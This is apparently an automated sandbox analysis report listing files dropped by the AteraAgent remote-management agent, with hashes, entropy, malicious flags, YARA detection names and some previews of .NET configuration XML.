                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):19496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.521443897537438
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:YyPa16oAL4D+wW9IWmDIW4IWYDa9Nyb8E9VF6IYijSJIVxF/HLTa:YWs6oqDjADKeDa5EpYi60tTa
                                                                                                                                                                                                                                                                                                                                  MD5:D64D6BA70AA296A65C98A50DC8F01ED9
                                                                                                                                                                                                                                                                                                                                  SHA1:1742A71268A3306E0AD796DD09EEB9B9864CA9D3
                                                                                                                                                                                                                                                                                                                                  SHA-256:47633B5D5A83B0F80985D62B5F5C9A2DBDC5257ECBAF3C3C07B6AF98E33624CD
                                                                                                                                                                                                                                                                                                                                  SHA-512:BFF916F54C22C4B0D1709238D608DDEA0C3F90632E9A7E2ADA4E3C5DCF3AD67E3A4CC7F0F05ADFE471FBA6BF6648EEC3C5C91658676EBEC8D3409421E0D5E003
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.408608114983166
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RjfAw5tisQ7Mkvwtwq6uUQ/B0X5tl9wCVjkz3pVS3UpoztjIF3Nyb8E9VF6IYiju:RksQ74GX7nwOa5VS2ozdIF7EpYi60C5
                                                                                                                                                                                                                                                                                                                                  MD5:B392A539476214703BDECB451F1286B6
                                                                                                                                                                                                                                                                                                                                  SHA1:F28DA8D40AF72D4EA08D9D904EC1B98711335125
                                                                                                                                                                                                                                                                                                                                  SHA-256:49554ACF71720003DC3287E56D4F4DC647886BF22E27D8B91233B92D626C90D8
                                                                                                                                                                                                                                                                                                                                  SHA-512:5E6C609B8C70F8D4CB87F64B6B00476A13497EBA170F71AA47F8DAD96CE80FD242A08417017FF3757ECF5B1F4EFF790E696A7A0E9D7714D8924BECD4080718B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1547
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                                                                                                                  MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                                                                                                                  SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                                                                                                                  SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                                                                                                                  SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):79912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.066410859406026
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:M9+DHJ7vgt3f9mKGpqfwTwL5pxaRt4csUhtcyWH7Ov+t7mEpYi605Hm:U+DHJCmKK0wu5RcsU7cyWH737H76N
                                                                                                                                                                                                                                                                                                                                  MD5:6B5E1EB2B26811947EBC7BB7F8633B5B
                                                                                                                                                                                                                                                                                                                                  SHA1:BA5874861002E71308F1FB4B2738BCDB39FCA309
                                                                                                                                                                                                                                                                                                                                  SHA-256:434E69F7ADBED6670B7037B37F514CB7BAFC9C745431040F12B2B4DD1F51F781
                                                                                                                                                                                                                                                                                                                                  SHA-512:611EB9422547EB7AFD53D25023A6E327932FBD2485C920BE71E3ABA40A50FE020A4E61C63CB4448053F6779B5553D393EB181FB43446AE2AF4F29E247F8D8EEE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):953
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.9874198404771155
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JduPF7NhOXrRH2/dVxlPH2/FVQ7uH2/F9y:327O7RgdjdgFSagFw
                                                                                                                                                                                                                                                                                                                                  MD5:8C9F9547ABA4CD154FAA858695986C4E
                                                                                                                                                                                                                                                                                                                                  SHA1:667630B8AEA31C20C20EE569983B73028F0DBA21
                                                                                                                                                                                                                                                                                                                                  SHA-256:7DE06E53089587194D3669B5F2050B363CC2AC1BC66F0537EC4D7AD94357D46F
                                                                                                                                                                                                                                                                                                                                  SHA-512:C305E923A197E2C39813D423FE50D94F183E932BCC66DBEE5667AD7F4083254D50510E35ED3603555FEB4C42F580C8A1FA3D1568CC7305D22B79AB406607F836
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):350248
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.8981776683037355
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:kr71RSb/jb50EH8VAynnnnnnnnnnnnnnn8fMF:H5q
                                                                                                                                                                                                                                                                                                                                  MD5:2E651E24D757C144724D37E2F5325956
                                                                                                                                                                                                                                                                                                                                  SHA1:32F3BD69FA1B05F2E88A6D9FECB861272F2A323C
                                                                                                                                                                                                                                                                                                                                  SHA-256:042AFEA8995A3AA13001C50B36959C1171D61BDCABFA49D3C7FA129F1A137AA1
                                                                                                                                                                                                                                                                                                                                  SHA-512:CBF4E6E922F6D787198F7C9BA5AC6A68706E47C1A2C4AEA7A25BE55EF92824F6EBC63FC94FB33E18A38B591266A6C4142D79C59F9E82699D84E5F24E74648132
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1786
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.998101412964689
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3sIk7O7RgdjdgFSagFgg+msg+w3Zg+wBw:8TizwzH
                                                                                                                                                                                                                                                                                                                                  MD5:DACBD4EDD0163701F63ADA3E81D8540E
                                                                                                                                                                                                                                                                                                                                  SHA1:219647896B3575AA8A07E2903D50304919C27CA7
                                                                                                                                                                                                                                                                                                                                  SHA-256:DF0FBC7B2A5449681549C81B7EB77B2CE8D3C0C62244C39442A73A0291124BCB
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C725DEE661DF9FFE6D3723606FAF98F0B16094DAFC011CDE062436B351671E952A2C6CFA218E08785DBC2E69E97EC8218E1447683C1450C5BF9CCDC75C2EA73
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):59944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.132661735364399
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:U6O442hHI1kIHLxnuFjBm+UuLcxVePk+CXVT+rB9ezGREpYi60G:U6O4JuxnT+UuLMcBClyrvGGa763
                                                                                                                                                                                                                                                                                                                                  MD5:BD26EAA17F4B2D97B949C6179A0A9123
                                                                                                                                                                                                                                                                                                                                  SHA1:B6DC1F8FBCBF6B0F33F51E071EE640143CF1EF9D
                                                                                                                                                                                                                                                                                                                                  SHA-256:72B3F2E765A37D45A5FB749FD4C5EC777939A06C44865E6AA8F64980515C2606
                                                                                                                                                                                                                                                                                                                                  SHA-512:38FBEBD77ED740F647F2F3474E5E1DCCAECACB22FBB0E05FD6696F6BD9FF1D5D6B335B7882365FCA8B6D9ABB8FC5C8525C27DAE1D3544DEEE8242A47EEF608A8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1191
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.971943087661362
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JduPF7NhOXrRH2/dVQ7uH2/FVxlPH2/FV0PH2/+w39y:327O7RgdSagFjdgFsg+w3w
                                                                                                                                                                                                                                                                                                                                  MD5:B8E88B1C181AFEB535BFEA1155000E8E
                                                                                                                                                                                                                                                                                                                                  SHA1:EB9066E96542DCE5F35DBF2F1424FD79ACEBB65F
                                                                                                                                                                                                                                                                                                                                  SHA-256:5D094CC46FED5173A2B1BE4C8E5DBDB658D2C14ABD367C47DFC6F6EABD5F295C
                                                                                                                                                                                                                                                                                                                                  SHA-512:58459651D3358FDDD4114AB569786A2306338C08D27D3D449BE2084EAE9D4A619C5650D3699DCA6702AEFDE8F9E77FD9E56C87EF51D4A8CCB2A22A378C488C37
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.499110601684846
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KLOGTOwM15TRwLm6or29Nyb8E9VF6IYijSJIVxyycCc:KnMTR0Pa25EpYi60tc
                                                                                                                                                                                                                                                                                                                                  MD5:4B6E586C1B942B65439A2F9A963B6154
                                                                                                                                                                                                                                                                                                                                  SHA1:EB940E77A0BEA7559D93379D3B53C6ED098A037C
                                                                                                                                                                                                                                                                                                                                  SHA-256:4B106D19EEC683BAA78F0C5AED41629638F4B72B0C9C67E60CD40107EDDEB5A1
                                                                                                                                                                                                                                                                                                                                  SHA-512:B3CCF4072F61C2119ACDEF297B6D9DC67064A38823553B8F04FDD83BBFCE024F93EB9778DAEB905CF6E0F5C4A8D8D7ADBC8A763FB16A7651926831FF0E4D0307
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1817640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.551341026038557
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:r9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkPz:r9Nzm31PMoz
                                                                                                                                                                                                                                                                                                                                  MD5:BF7A6CF861B613CE5394F0575E5664A3
                                                                                                                                                                                                                                                                                                                                  SHA1:9FDE648F515D8A4069340E2781C6EBCC119B0B7E
                                                                                                                                                                                                                                                                                                                                  SHA-256:980B3639A01B0F62C8E760BA637BB83C509667DDBD02E68FC114983331B875A7
                                                                                                                                                                                                                                                                                                                                  SHA-512:CF34346F5AEFDA23E1824C44870CFDE7DB87E00C1D85508F7FC35C3F5BD06794DF008127F370666C0E53BB6F3B14ECFC54ECD7DB149BF298DDFCFAC2394EAE37
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1436200
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.781307459548009
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Ys5ThI+vIjDEzn7tcBGtYnxLbdVlRdouD5RawYkGq78Yr4i9YE1tOvhefHXCvEsi:nlI+vIjE7mjOuKa8Riy+gvhaIn2+0V
                                                                                                                                                                                                                                                                                                                                  MD5:869599488E6C1DA641F0EC556898F1D0
                                                                                                                                                                                                                                                                                                                                  SHA1:F9D6448981059B62040AFF630B76D0B2AE9A1A2E
                                                                                                                                                                                                                                                                                                                                  SHA-256:DEC6449DCE5410895503E7D946761C5A40DF7D03DCCE47B4153601507357F6B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:013861070B779D7B9E61971499B794E324BF4AE0F5FA0D2BC397349631E7037E4376FBCB94454D6F3ED90BAE071D3D6756E96AD0985D9B1229214FDABAC675EA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):583489
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99944408666799
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:CLLJGMlifhYeKrN8qSQDqPVK04BwQjtVcUf7DmZMilOugjC6w:GwfhYeKraZQDqPY0E/4Uf7owugjm
                                                                                                                                                                                                                                                                                                                                  MD5:9614D1DA18956DE06747C03068208D66
                                                                                                                                                                                                                                                                                                                                  SHA1:FEA2680DDB9E4CEEA8489A132DF9A1542FEBFE88
                                                                                                                                                                                                                                                                                                                                  SHA-256:DDE9E0CA3FD274902F1A4C22CFEC6870C6C4DBBCCAD17D2189477AB60F769DAB
                                                                                                                                                                                                                                                                                                                                  SHA-512:D8E46A5819E9DCED61471966646DE153BF3480933054C50190D50DE4900685265367B12C9147630F184CE8809786FC010BF6FCD1884035FB4C77CFDE660A8B9D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):55344
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.801614737823664
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:R4DgbepEIgcvDiMd+R5B153ieGuftxw5dfiGoxkEpYinAMxCN4:Rr4EIgcxdQdGuftxw5dfiZd7Hxe4
                                                                                                                                                                                                                                                                                                                                  MD5:D11B2139D29E79D795054C3866898B7F
                                                                                                                                                                                                                                                                                                                                  SHA1:020581C77ED4BC01C3F3912F304A46C12CA443E6
                                                                                                                                                                                                                                                                                                                                  SHA-256:11CDB5EC172389F93F80D8EFF0B9E5D4A98CFEAB6F2C0E0BC301A6895A747566
                                                                                                                                                                                                                                                                                                                                  SHA-512:DE5DEF2EFCBA83A4B9301DD342391C306CF68D0BB64104839DFC329B343544FD40597A2B9867FD2A8739C63081D74157ACFC9B59C0CB4878B2F5155F582A6F09
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):535
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.076084597400077
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdG3VO3rdZRLNFF7ap+5v5OXrRf/2//FicYo4xm:JdfrdDPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                                                                                                                  MD5:D505E3DE03F172FA2B246E210054C5F7
                                                                                                                                                                                                                                                                                                                                  SHA1:F5A480F56F760EEBA3B29108387E54D70A721127
                                                                                                                                                                                                                                                                                                                                  SHA-256:A568F933F09B1AD1EE5E88DDCFFA1FE5921D18B73477136E1FAEE55F2BEF399A
                                                                                                                                                                                                                                                                                                                                  SHA-512:80F01447B43525DBDF5B283522FE14D9AECEF16E55EA3FE36DC0A94B53C49E03BB56136F0911C348FB78FB5AF6112B1DE7C38CBFFBD73ACB2971655EF1B2B859
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXSjn:WBa
                                                                                                                                                                                                                                                                                                                                  MD5:7E9C5492C1485A2AE94A108F6FFEEA95
                                                                                                                                                                                                                                                                                                                                  SHA1:F00A6A35F3D41AFF9ED2C028C26D918EEF06B715
                                                                                                                                                                                                                                                                                                                                  SHA-256:04CA73099B2058974220319A7CC3E156AE24AFA13B28F340E8D97B021D1BBC95
                                                                                                                                                                                                                                                                                                                                  SHA-512:191B4297645813DD163611547EC2708BD6678E535429FC4D771472BC185C887CAF24FAAA7F1DCF78577739E3D06387A756A11193C68918DDF47D21328CA1E4DC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=27.2
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):96816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179944898759355
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:XJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwm:XQUm2H5KTfOLgxFJjE50vksVUfPvCz
                                                                                                                                                                                                                                                                                                                                  MD5:9A344D6A16A6FEF791701FC52FA722A2
                                                                                                                                                                                                                                                                                                                                  SHA1:7F1CEF75650CA626D79F7F15818851A9C297F65E
                                                                                                                                                                                                                                                                                                                                  SHA-256:80890B7E8F3CC557A87BB1F84C7C30CA9B08B3F8AA68184D99439305EF91388E
                                                                                                                                                                                                                                                                                                                                  SHA-512:93ED10309A2EA138FE31BE55F82627290DDA0F8B7AEA63A54D97BB6EF2985BCC0449FCCC288DEF154D9F3318FB4DA9CAC3FBB4727986997DD1CDD5C97541139E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186416
